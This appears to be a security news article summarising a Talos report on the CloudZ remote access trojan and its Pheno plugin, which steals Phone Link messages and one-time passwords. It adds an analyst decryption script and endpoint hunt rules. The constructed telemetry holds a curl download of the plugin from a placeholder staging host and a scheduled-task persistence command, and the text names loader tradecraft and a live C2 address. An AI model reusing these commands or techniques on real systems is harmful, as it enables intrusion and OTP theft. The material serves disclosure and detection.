CloudZ RAT used Pheno plugin to harvest Phone Link OTPs

Cisco Talos found CloudZ RAT using a Pheno plugin to monitor Microsoft Phone Link on Windows and exfiltrate Phone Link SQLite files, including SMS-based OTPs and notifications.

Cisco Talos disclosed on May 5, 2026 that it observed an intrusion active since at least January 2026 in which the CloudZ remote access trojan (RAT) and a previously undocumented plugin named Pheno were used to collect Phone Link data and one-time passwords.

The operation began with an unknown initial access vector that led to execution of a fake ScreenConnect update installer. The installer was a Rust-compiled 64-bit loader disguised with names such as “systemupdates.exe” and “Windows-interactive-update.exe.” When executed, the loader decrypted and dropped a .NET loader into C:\ProgramData\Microsoft\windosDoc\ (under file names such as update.txt), then ran an embedded PowerShell script to create a scheduled task named SystemWindowsApis that launched the .NET loader via the legitimate regasm.exe binary.

The .NET loader performed multiple anti-analysis checks. It used timing checks to detect sandbox environments, scanned for security tools such as Wireshark, Fiddler, Procmon and Sysmon, and searched system paths and hostnames for virtual machine or sandbox indicators. The loader reassembled an embedded payload from hex chunks and decrypted it with a bytewise XOR using the key 0xCA. If the payload was a .NET assembly it executed it in memory; otherwise it wrote the payload to %TEMP% and ran it.
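The payload step above (hex chunks joined, XORed with 0xCA, then branched on whether the result is a .NET assembly) is the part an analyst most often has to reproduce when triaging a sample. The following is an added example, not code from the Talos report or from the loader itself: it reassembles and decrypts the chunks and decides the managed-vs-native branch by checking the CLR runtime data directory of the PE header. The chunk layout, the stub PE used as sample input, and the RVA/size values in it are constructed assumptions; only the key 0xCA and the branch logic come from the report.

```python
"""Analyst-side reconstruction of the CloudZ .NET loader's payload step.

Added example, not code from the Talos report or from the malware. The report
states only that the loader joins an embedded payload from hex chunks, XORs it
bytewise with 0xCA, runs the result in memory if it is a .NET assembly and
otherwise drops it to %TEMP%. The chunk layout and the stub PE used as sample
input are constructed here for illustration.
"""
import struct
from typing import Iterable, List, Tuple

XOR_KEY = 0xCA  # single-byte key reported by Talos


def reassemble(chunks: Iterable[str]) -> bytes:
    """Join hex-string chunks (whitespace tolerated) into raw bytes."""
    return bytes.fromhex("".join(c.strip() for c in chunks))


def xor_decrypt(data: bytes, key: int = XOR_KEY) -> bytes:
    """Bytewise XOR; symmetric, so the same call also re-encrypts."""
    return bytes(b ^ key for b in data)


def is_pe(data: bytes) -> bool:
    """MZ stub plus a valid e_lfanew pointing at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def is_dotnet_assembly(data: bytes) -> bool:
    """A managed PE carries a non-empty CLR runtime header in data directory 14."""
    if not is_pe(data):
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    opt = e_lfanew + 4 + 20              # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                   # PE32
        count_off, dir_base = opt + 92, opt + 96
    elif magic == 0x20B:                 # PE32+
        count_off, dir_base = opt + 108, opt + 112
    else:
        return False
    if len(data) < dir_base + 15 * 8:
        return False                     # truncated header, no room for directory 14
    if struct.unpack_from("<I", data, count_off)[0] < 15:
        return False                     # no COM descriptor slot at all
    clr_rva, clr_size = struct.unpack_from("<II", data, dir_base + 14 * 8)
    return clr_rva != 0 and clr_size != 0


def classify(chunks: Iterable[str]) -> Tuple[str, bytes]:
    """Mirror the loader's branch: managed assembly vs. native PE vs. unknown blob."""
    payload = xor_decrypt(reassemble(chunks))
    if is_dotnet_assembly(payload):
        return "dotnet-assembly", payload   # loader would execute this in memory
    if is_pe(payload):
        return "native-pe", payload         # loader would drop this to %TEMP% and run it
    return "unknown", payload


# --- constructed sample input (not a real sample) ----------------------------
def build_stub_pe(dotnet: bool) -> bytes:
    """Minimal, non-runnable PE32+ header (constructed) with or without a CLR directory."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)  # x64, 240-byte optional header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)             # NumberOfRvaAndSizes
    if dotnet:
        struct.pack_into("<II", opt, 112 + 14 * 8, 0x2008, 0x48)  # CLR header RVA/size (constructed)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


def to_hex_chunks(payload: bytes, chunk_hex_len: int = 32) -> List[str]:
    """Apply the same XOR and split into hex chunks the way a loader might embed them."""
    encoded = xor_decrypt(payload).hex()
    return [encoded[i:i + chunk_hex_len] for i in range(0, len(encoded), chunk_hex_len)]


if __name__ == "__main__":
    for managed in (True, False):
        verdict, blob = classify(to_hex_chunks(build_stub_pe(managed)))
        print(f"{verdict}: {len(blob)} bytes")
```

On a real sample you would feed `classify()` the chunk strings carved from the loader's resources or string table; the `is_dotnet_assembly()` check reads the same data-directory slot that the CLR itself consults, so it does not depend on any string in the payload.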

The payload was CloudZ, a modular .NET RAT compiled in mid-January 2026 and obfuscated with ConfuserEx. CloudZ decrypts its configuration in memory, downloads secondary configuration from attacker-controlled staging URLs (including several under hellohiall.workers[.]dev and Pastebin raw pages), and establishes TCP connections to a command-and-control server at 185.196.10.136 on port 8089. The RAT rotates user-agent strings and includes anti-caching HTTP headers. Its command dispatcher supports credential and browser-data theft, file download and write operations, screen recording, plugin management, and a GetWidgetLog command used for Phone Link reconnaissance.

Talos observed the RAT using its plugin subsystem to download and execute a plugin called Pheno. CloudZ attempts downloads first with curl, then with PowerShell Invoke-WebRequest, and finally with bitsadmin. In the incident Talos recorded a curl command retrieving pheno.exe from an attacker staging server.

Pheno scans running processes for Phone Link components such as YourPhone, PhoneExperienceHost and Link to Windows. When it finds matches it writes process IDs and paths to files named phonelink-<COMPUTERNAME>.txt in staging folders such as C:\ProgramData\Microsoft\feedback\cm and %TEMP%\Microsoft\feedback\cm. The plugin then searches those files for the keyword “proxy.” Phone Link creates a local proxy when relaying traffic between a paired mobile device and the PC; finding “proxy” causes Pheno to mark the session as “Maybe connected.” CloudZ reads the staging files and can copy Phone Link SQLite database files (for example PhoneExperiences-*.db) and send them to the operator, potentially exposing SMS messages, OTPs and notification content without infecting the mobile device.
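The loader persistence (regasm.exe launched from C:\ProgramData\Microsoft\windosDoc\ by the SystemWindowsApis task), the C2 address and port, the curl/Invoke-WebRequest/bitsadmin plugin download chain, and the Pheno staging files described above each leave a distinct endpoint artifact. The following is an added defender-side example, not Talos's published Snort or ClamAV content: it encodes those artifacts as hunt rules and runs them over constructed telemetry. The event schema, the command lines, the binary names cloudz.exe and pheno.exe, and the STAGING-SERVER and PHONELINK-PACKAGE placeholders are assumptions; the paths, task name, process names, C2 address and file-name patterns are taken from the report.

```python
"""Hunt rules for the CloudZ / Pheno tradecraft described in the Talos write-up,
run over constructed endpoint telemetry.

Added defender-side example, not Talos's published Snort/ClamAV content. The
event schema, the command lines and the STAGING-SERVER and PHONELINK-PACKAGE
placeholders are assumptions; the paths, task name, process names, C2 address
and file-name patterns come from the report.
"""
import re
from typing import Dict, List

C2_IP, C2_PORT = "185.196.10.136", 8089
TASK_NAME = "systemwindowsapis"
LOADER_DIR = re.compile(r"c:\\programdata\\microsoft\\windosdoc\\", re.I)
STAGING_RE = re.compile(r"\\microsoft\\feedback\\cm\\phonelink-[^\\]+\.txt$", re.I)
PHONELINK_DB = re.compile(r"phoneexperiences-[^\\]*\.db$", re.I)
DOWNLOADERS = {"curl.exe", "powershell.exe", "bitsadmin.exe"}   # CloudZ fallback order
PHONELINK_PROCS = {"phoneexperiencehost.exe", "yourphone.exe"}  # legitimate readers of the DB


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(event: dict) -> List[str]:
    """Return the rule names an event trips (empty list if none)."""
    hits: List[str] = []
    kind = event["type"]
    if kind == "process":
        image, cmd = basename(event["image"]), event["cmdline"].lower()
        if image == "regasm.exe" and LOADER_DIR.search(cmd):
            hits.append("cloudz-loader-via-regasm")
        if image in {"schtasks.exe", "powershell.exe"} and TASK_NAME in cmd:
            hits.append("cloudz-persistence-task")
        if image in DOWNLOADERS and "pheno.exe" in cmd:
            hits.append("cloudz-plugin-download")
    elif kind == "file":
        path = event["path"]
        if STAGING_RE.search(path):
            hits.append("pheno-staging-file")
        # Phone Link's own processes read PhoneExperiences-*.db; anything else is suspect.
        if PHONELINK_DB.search(path) and basename(event["image"]) not in PHONELINK_PROCS:
            hits.append("phonelink-db-access-by-foreign-process")
    elif kind == "network":
        if event["dst_ip"] == C2_IP and event["dst_port"] == C2_PORT:
            hits.append("cloudz-c2-connection")
    return hits


def hunt(events: List[dict]) -> Dict[int, List[str]]:
    """Map event id -> triggered rules, keeping only events with at least one hit."""
    return {e["id"]: h for e in events if (h := evaluate(e))}


# --- constructed telemetry (not from the incident) ---------------------------
DB_PATH = r"C:\Users\alice\AppData\Local\Packages\PHONELINK-PACKAGE\PhoneExperiences-sample.db"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe C:\ProgramData\Microsoft\windosDoc\update.txt"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn SystemWindowsApis /tr "regasm.exe C:\ProgramData\Microsoft\windosDoc\update.txt"'},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -o pheno.exe http://STAGING-SERVER/pheno.exe"},
    {"id": 4, "type": "file", "image": r"C:\Users\Public\pheno.exe",
     "path": r"C:\ProgramData\Microsoft\feedback\cm\phonelink-DESKTOP-SAMPLE.txt"},
    {"id": 5, "type": "file", "image": r"C:\ProgramData\Microsoft\windosDoc\cloudz.exe", "path": DB_PATH},
    {"id": 6, "type": "file",
     "image": r"C:\Program Files\WindowsApps\PHONELINK-PACKAGE\PhoneExperienceHost.exe", "path": DB_PATH},
    {"id": 7, "type": "network", "image": r"C:\ProgramData\Microsoft\windosDoc\cloudz.exe",
     "dst_ip": "185.196.10.136", "dst_port": 8089},
    {"id": 8, "type": "network", "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "10.0.0.5", "dst_port": 443},
]

if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(rules))
```

The rules are deliberately narrow (exact task name, exact C2 socket, the report's staging directory and file-name pattern) so they can be dropped into an EDR query with few false positives; the one behavioural rule, access to PhoneExperiences-*.db by a process other than Phone Link's own, is the one worth keeping after the specific indicators rotate, since it catches the data theft regardless of which loader delivered it.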

Cisco Talos published indicators of compromise and detection signatures, including ClamAV detections Win.Packed.Msilheracles-10030690-0 and Win.Trojan.CloudZRAT-10059935-0 / 10059959-0, Snort SIDs 66408–66410 and Snort 3 SID 301492, and additional technical details on its GitHub repository.
